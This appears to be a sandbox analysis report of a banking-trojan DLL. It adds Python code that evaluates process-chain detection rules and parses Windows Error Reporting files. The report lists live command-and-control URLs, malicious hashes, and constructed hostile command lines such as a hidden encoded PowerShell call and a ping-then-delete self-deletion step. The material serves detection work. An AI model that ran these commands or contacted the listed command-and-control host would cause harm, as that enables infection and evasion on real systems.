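```python
"""Added example, not part of the Joe Sandbox report: replays the process
chain from the behavior graph as Sysmon-style process-creation events and
evaluates detection logic for the behaviours the report flags. The
parent/child pairs and the dropped DLL name come from the graph; PIDs,
image paths and command-line text are constructed assumptions."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as Sysmon Event ID 1 would log it
    cmdline: str


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


# Constructed sample telemetry (assumed values; only the tree shape and the
# pkbugtxo.dll name are taken from the report).
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\user\AppData\Local\Temp\doc.hta"'),
    ProcEvent(101, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -e UwB0AGEAcgB0AC0AUwBsAGUAZQBwAA=="),
    ProcEvent(102, 101, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline"'),
    ProcEvent(103, 102, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
              r'cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1.res"'),
    ProcEvent(200, 1, r"C:\Windows\System32\loaddll32.exe",
              r'loaddll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll"'),
    ProcEvent(201, 200, r"C:\Windows\SysWOW64\cmd.exe",
              r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1'),
    ProcEvent(202, 201, r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1'),
    ProcEvent(203, 202, r"C:\Windows\System32\control.exe", "control.exe"),
    ProcEvent(300, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(301, 300, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll"'),
    ProcEvent(302, 301, r"C:\Windows\System32\PING.EXE", "ping localhost -n 5"),
    # Benign control: a normal service host that must not trigger anything.
    ProcEvent(400, 1, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
ORDINAL_RE = re.compile(r",\s*#\d+\b")                      # rundll32 "x.dll",#1
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
PING_THEN_DEL_RE = re.compile(r"(?i)\bping\b.*&&\s*del\b")   # sleep-by-ping, then delete


def evaluate(events):
    """Return sorted (pid, rule) pairs for every event that matches a rule.
    Each rule looks at the event and, where needed, at its parent."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        child = image_name(e.image)
        pname = image_name(parent.image) if parent else ""
        if pname == "mshta.exe" and child in SHELLS:
            hits.append((e.pid, "mshta spawning a shell"))
        if child == "powershell.exe" and ENCODED_RE.search(e.cmdline):
            hits.append((e.pid, "powershell encoded command"))
        if child == "csc.exe" and pname == "powershell.exe":
            hits.append((e.pid, "powershell compiles C# at runtime (Add-Type)"))
        if child == "rundll32.exe" and ORDINAL_RE.search(e.cmdline):
            hits.append((e.pid, "rundll32 export called by ordinal"))
        if child == "control.exe" and pname == "rundll32.exe":
            hits.append((e.pid, "control.exe spawned by rundll32"))
        if child == "cmd.exe" and PING_THEN_DEL_RE.search(e.cmdline):
            hits.append((e.pid, "ping delay followed by del (self-deletion)"))
    return sorted(hits)


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(f"pid {pid}: {rule}")
```

The parent-aware rules are the ones worth keeping: csc.exe and cvtres.exe under PowerShell are legitimate for Add-Type, so they only become interesting together with the mshta parent and the later injection into explorer.exe, and the ping-then-del pattern is the concrete form behind the report's "Uses ping.exe to sleep" and "Self deletion via cmd delete" signatures.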

Antivirus, Machine Learning and Genetic Malware Detection

Submitted file:
Source | Detection | Scanner | Label
HxEWwh74qT.dll | 37% | Virustotal |
HxEWwh74qT.dll | 31% | ReversingLabs | Win32.Trojan.Lazy
HxEWwh74qT.dll | 100% | Joe Sandbox ML |

No Antivirus matches

Unpacked PE files:
Source | Detection | Scanner | Label
3.2.rundll32.exe.4de0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293

Domains:
Source | Detection | Scanner | Label
l-0007.l-dc-msedge.net | 0% | Virustotal |
a-0019.standard.a-msedge.net | 0% | Virustotal |

URLs:
Source | Detection | Scanner | Label
http://146.70.35.138/phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.src | 0% | Avira URL Cloud | safe
http://146.70.35.138/phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.src | 0% | Avira URL Cloud | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://ns.adobY | 0% | URL Reputation | safe
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe

Note that the reputation services rate the two 146.70.35.138 request URLs "safe" at 0% while the same report classifies the host as malicious; URL reputation is of little use for one-off, per-infection C2 paths like these.
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
l-0007.l-dc-msedge.net | 13.107.43.16 | true | true | | unknown
a-0019.standard.a-msedge.net | 204.79.197.222 | true | false | | unknown

(13.107.43.16 also appears in the report's own list of IPs excluded from analysis as whitelisted, below, so the "malicious" flag on l-0007.l-dc-msedge.net should be read with that in mind.)

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://146.70.35.138/phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.src | true | Avira URL Cloud: safe | unknown
http://146.70.35.138/phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.src | true | Avira URL Cloud: safe | unknown
URLs found in memory or binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp; control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp; control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://ns.adobY | explorer.exe, 00000021.00000000.523469701.00000000026D0000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000021.00000000.572314670.00000000026D0000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000021.00000000.526704286.00000000026D0000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000021.00000000.562762119.00000000026D0000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://constitution.org/usdeclar.txt | rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp; control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp; control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000014.00000002.767419442.000002DC67D31000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://constitution.org/usdeclar.txtC: | rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp; control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp; control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

The strings "http://https://file://USER.ID%lu.exe/upd" and "http://constitution.org/usdeclar.txt" (a printf-style template and a fetch target, not live URLs) occur in exactly the three processes that carry the injection signatures in the behavior graph (rundll32.exe, powershell.exe, control.exe), so they are candidates for memory-scanning rules even though URL reputation rates them safe. The Pester, Apache licence and xmlsoap entries are ordinary PowerShell module strings.
Public IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true

Private IPs:
192.168.2.1
                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:613862
Start date and time:2022-04-22 15:25:25 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 13m 32s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:HxEWwh74qT (renamed file extension from none to dll)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:41
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:2
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.bank.troj.evad.winDLL@28/29@0/2
                            EGA Information:
                            • Successful, ratio: 75%
                            HDC Information:
                            • Successful, ratio: 77.6% (good quality ratio 73.3%)
                            • Quality average: 80.8%
                            • Quality standard deviation: 28.6%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 77
                            • Number of non-executed functions: 20
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.43.16, 52.182.143.212
                            • Excluded domains from analysis (whitelisted): fp.msedge.net, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 6304 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
15:26:45 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
15:26:53 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
15:27:31 | API Interceptor | 31x Sleep call for process: powershell.exe modified
IP context (other samples seen contacting the same IP):
Match | Associated Sample Name / URL | Detection
146.70.35.138 | b.exe | malicious
146.70.35.138 | 0x0007000000012676-63.exe | malicious
Domain context (other samples seen resolving the same domain; all detected as malicious):

a-0019.standard.a-msedge.net (context IP 204.79.197.222):
  SecuriteInfo.com.Trojan.DownLoader44.47620.31238.dll
  https://u18128412.ct.sendgrid.net/ls/click?upn=ClQ3u4srWH1DLgg8yUCqjFuIqSkhaE0H41NlZHnpXF50n1dcOFFkYo3z5RtKfZ8x-2F76tDiFmc2e1L-2FVZLlKBrK2CrdgqYFJtTYbAiN7v1sXGtxtRhF0goQDt7fy7SnPPQQJO_udT3v8hfWpShd4l40iR1YjDwBF203d0tl3LIdyVMOSuA20GEIOKQduBpjuvr26O-2Fnj9cEw-2BjOJLLZRFgtlHhZGSbfQJIGzdKSRmcz6dYOq8WEr8avEC5ts5-2BSGOZMjlfDg4wAHy4KbgCF1ox-2BU8-2F6O0Cwukxea5IPYuarnBfwlL-2B6p31Mu2l-2BYlu-2BvlWBdkKZTTl7tQhBttD09hiqQinzJ-2FRzwFMCPsSi5vYeIXks-2Bg-3D
  nidaz.exe
  SecuriteInfo.com.Variant.Bulz.709809.27666.exe
  N7oJYgvm4B.exe
  iIsis8FI6u.exe
  csbMM44im8.exe
  Z3ADN6GmL1.exe
  ffdshowInstall.exe
  sq564FoU8n.exe
  D0h6VtFChM.exe
  S3sktQcYXPChxy5.exe
  Sales Contract.exe
  uL2e4sO4i1.exe
  Gp2M1wXObH.exe
  lGbJyJcFAU.exe
  dhl_doc1755860002.exe
  v4AXSw6EGK.exe
  Order confirmation.exe
  Ordem de Compra.pdf.exe

l-0007.l-dc-msedge.net (context IP 13.107.43.16):
  6253ed88d7cd5.dll
  624c84a8263d3.dll

Both domains belong to the msedge.net family that the analysis OS contacts on its own (compare the whitelisted msedge.net hosts in the excluded-domain list above), so this context reflects background traffic shared across many unrelated samples rather than infrastructure specific to this one.
ASN context (other samples seen contacting IPs in TENET-1ZA; all detected as malicious; sample: IP):
  o0nBmbV6au: 163.200.142.51
  84wwQQbbDj: 143.128.168.158
  o2AHUUgivh: 146.239.92.86
  b.exe: 146.70.35.138
  bKhQyaq7WP.exe: 146.70.87.230
  wZtQzFZJYa.exe: 146.70.87.230
  H7qgr6X0nv: 155.233.139.115
  eoT6xLnNfY.exe: 146.70.87.230
  jew.x86: 146.69.137.13
  sora.arm: 155.232.149.247
  irq0: 146.68.19.240
  l0zzxRl556.exe: 146.70.87.230
  wuxznEjJoI: 143.128.168.138
  BKpr0Ubn9l: 196.249.7.64
  pandora.arm7-20220417-1500: 152.106.89.16
  daddyl33t.arm-20220414-2250: 146.141.78.228
  0x0007000000012676-63.exe: 146.70.35.138
  510mZMDMrA: 146.232.14.37
  sora.mpsl: 196.24.222.225
  cK1mF6pCC9: 146.68.82.22

An ASN-level match is a coarse pivot: the list mixes samples named for non-Windows architectures (sora.arm, sora.mpsl, jew.x86) with Windows executables. Only b.exe and 0x0007000000012676-63.exe share the exact C2 address 146.70.35.138; the four samples on 146.70.87.230 are the next closest cluster.
                                No context
                                No context
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8464047761659802
                                Encrypted:false
                                SSDEEP:96:85XB+F6wnYypy9haoKzfFEpXIQcQRc6+vcECAcw3p+a+z+HbHgiTAS/Y5ZU6h5P6:8pB+7nSHPKvBdjlq/u7sDS274ItW
                                MD5:B50C687C29BF44DAF94017951E1B1FA4
                                SHA1:035A1C3720BC2834F2EEA0B5C5C012FFCFA54D59
                                SHA-256:2B8D1BCCBD738DC93D23DB997E54B92B08D8E46F1DA33DA0159495779135CCD0
                                SHA-512:749ADFCD605FB1A481BD7387B9F447457050DE42C0F57139F9484EB263EE92A7451039AC45EF6E928D93B5D735FE058F194D1D43BEDE11862AB322AB284A97FA
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.0.0.1.9.1.8.2.1.7.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.0.0.2.1.7.9.1.5.3.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.b.d.0.0.1.3.-.3.d.b.f.-.4.d.7.f.-.8.8.c.1.-.6.7.0.7.0.3.6.a.7.0.4.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.4.5.b.3.1.7.-.b.8.9.3.-.4.9.1.7.-.b.2.f.8.-.e.5.c.d.f.0.e.1.0.7.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.8.-.0.0.0.1.-.0.0.1.8.-.9.5.4.9.-.0.5.0.9.9.8.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8494287362949074
                                Encrypted:false
                                SSDEEP:96:88XxGFrhPwnYyTy9haot7JnXpXIQcQac6pcEccw35+a+z+HbHgiTAS/Y5ZU6h5Pg:8c8hynSH0tGtjlq/u7syS274ItW
                                MD5:25AA9B5977F4E6E9486A6B0AA7367E53
                                SHA1:49203D9B2C61AF1B0886A6DCF260AA93CA21B2BB
                                SHA-256:83C38D8B07784190C93DD783EE9D288CE2522B878FC5082287770ADAE6C7C018
                                SHA-512:21BC08B3F8B1445C51C6C45A996D87811B58E18F55AC3DAD19DF5675AD7A82B4552F3FEB909001E92E4045AE9A84D5C23C857A613A3DF57B5A38813345F5559E
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.0.0.0.9.5.4.4.5.4.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.0.0.1.1.9.9.7.5.4.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.8.1.3.5.a.1.-.4.b.e.d.-.4.5.3.8.-.8.e.b.5.-.1.e.7.d.f.5.8.c.a.2.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.d.d.a.2.2.c.-.7.d.e.a.-.4.f.8.3.-.a.d.7.1.-.1.7.3.5.d.5.7.6.3.5.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.8.-.0.0.0.1.-.0.0.1.8.-.9.5.4.9.-.0.5.0.9.9.8.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8429193116744815
                                Encrypted:false
                                SSDEEP:96:xqjA46wnYyNy9haoK7FISZpXIQcQac6pcEccw35+a+z+HbHgiTAS/Y5ZU6h5PMLv:xgnxH0tGtjlq/u7sDS274Itb
                                MD5:B662C448457F42C86FF6AE872E829F12
                                SHA1:6B760A764DFF5FEDE5A923E3953359ABE59BF098
                                SHA-256:BCA2030589C0C03A6958D7A5A60968DDE5EF57E5FE4861A63A6EF3D687A1F6F0
                                SHA-512:963A1D9194D6E19BAA6017D869B19420FE20A2A8839A570E7B3B21EF9CF0337FFA35C32913BF72556B612D8FBCFFC096D197F5D7A9A557F35F641EA84B2809B1
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.0.0.0.4.3.4.4.8.5.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.9.8.a.7.1.9.-.a.0.b.7.-.4.d.2.e.-.b.3.8.8.-.1.c.5.9.2.5.5.4.d.e.5.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.6.a.c.9.4.8.-.e.4.1.1.-.4.f.3.b.-.a.5.8.d.-.e.6.6.d.2.f.0.1.7.2.7.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.8.-.0.0.0.1.-.0.0.1.8.-.9.5.4.9.-.0.5.0.9.9.8.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.
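The three WerFault.exe drops above are Windows Error Reporting (.wer) text files: UTF-16LE with a byte-order mark, one key=value pair per CRLF-terminated line, which is why the preview renders as dotted characters. The following is an added example, not code from the report: a parser for that format plus a summary of what crashed. The sample bytes are constructed from the fields visible in the first preview, and the reading of Wow64Host/Wow64Guest as IMAGE_FILE_MACHINE values (34404 = 0x8664 = x64, 332 = 0x14C = x86) is the editor's addition; the report itself only shows the numbers.

```python
"""Added example, not from the Joe Sandbox report: parses the key=value
Windows Error Reporting (.wer) text that the WerFault.exe drops contain
(UTF-16LE with BOM, CRLF-separated) and summarises what crashed. The sample
bytes are constructed from the first preview's visible fields; the
Wow64Host/Wow64Guest -> IMAGE_FILE_MACHINE mapping is the editor's."""

MACHINE = {0x014C: "x86", 0x8664: "x64", 0xAA64: "arm64"}  # IMAGE_FILE_MACHINE_* values

# Constructed from the first WerFault drop's preview (fields reproduced as
# shown there; fields after the preview cut-off are not included).
_LINES = [
    "Version=1",
    "EventType=APPCRASH",
    "EventTime=132951400191821785",
    "ReportType=2",
    "Consent=1",
    "UploadTime=132951400217915325",
    "ReportStatus=524384",
    "ReportIdentifier=3bbd0013-3dbf-4d7f-88c1-6707036a7041",
    "IntegratorReportIdentifier=4d45b317-b893-4917-b2f8-e5cdf0e10715",
    "Wow64Host=34404",
    "Wow64Guest=332",
    "NsAppName=loaddll32.exe",
    "AppSessionGuid=00001ba8-0001-0018-9549-05099856d801",
    "TargetAppId=W:0000da39a3ee5e6b4b0d3255bfef95601890afd80709"
    "!0000da39a3ee5e6b4b0d3255bfef95601890afd80709!loaddll32.exe",
]
SAMPLE_WER = b"\xff\xfe" + ("\r\n".join(_LINES) + "\r\n").encode("utf-16-le")


def parse_wer(data: bytes) -> dict:
    """Decode a .wer file (UTF-16 with BOM; UTF-16LE assumed without one)
    into a dict of key -> value. Lines without '=' are skipped."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = data.decode("utf-16")       # honours and strips the BOM
    else:
        text = data.decode("utf-16-le")
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def summarise(fields: dict) -> dict:
    """Pull out the crash facts an analyst wants: event type, crashed image,
    host and guest architectures, whether the process ran under WOW64, and
    the report identifier for correlating with the Windows event log."""
    host = int(fields.get("Wow64Host") or 0)
    guest = int(fields.get("Wow64Guest") or 0)
    target = fields.get("TargetAppId", "")
    return {
        "event": fields.get("EventType"),
        "app": fields.get("NsAppName"),
        "host_arch": MACHINE.get(host, hex(host)),
        "guest_arch": MACHINE.get(guest, hex(guest)),
        "wow64": guest != 0 and guest != host,
        "target_exe": target.rsplit("!", 1)[-1] if target else None,
        "report_id": fields.get("ReportIdentifier"),
    }


if __name__ == "__main__":
    info = summarise(parse_wer(SAMPLE_WER))
    print(f"{info['event']} in {info['app']} "
          f"({info['guest_arch']} process on {info['host_arch']} host, "
          f"wow64={info['wow64']}), report {info['report_id']}")
```

Read against the report, the summary says a 32-bit loaddll32.exe crashed on a 64-bit host under WOW64, which is consistent with the SysWOW64\WerFault.exe path of the dropping process, the "Uses 32bit PE files" signature and the three WerFault.exe instances in the behavior graph.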
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 22 22:26:45 2022, 0x1205a4 type
                                Category:dropped
                                Size (bytes):41334
                                Entropy (8bit):2.004648071633227
                                Encrypted:false
                                SSDEEP:192:A854coHsADYmaZyZOGKWtP75TTmlZRCXL5CpVfS:A4yshxbGttP75TinRCXFCS
                                MD5:045591FB9A51E43D170A2F09CC3DADC1
                                SHA1:81CF74B064211B7258D207E5E299206175584D6D
                                SHA-256:AC3064CB253A5F508A4883613F1FA63A694AE5572B5D22F80E4F38375E533FD2
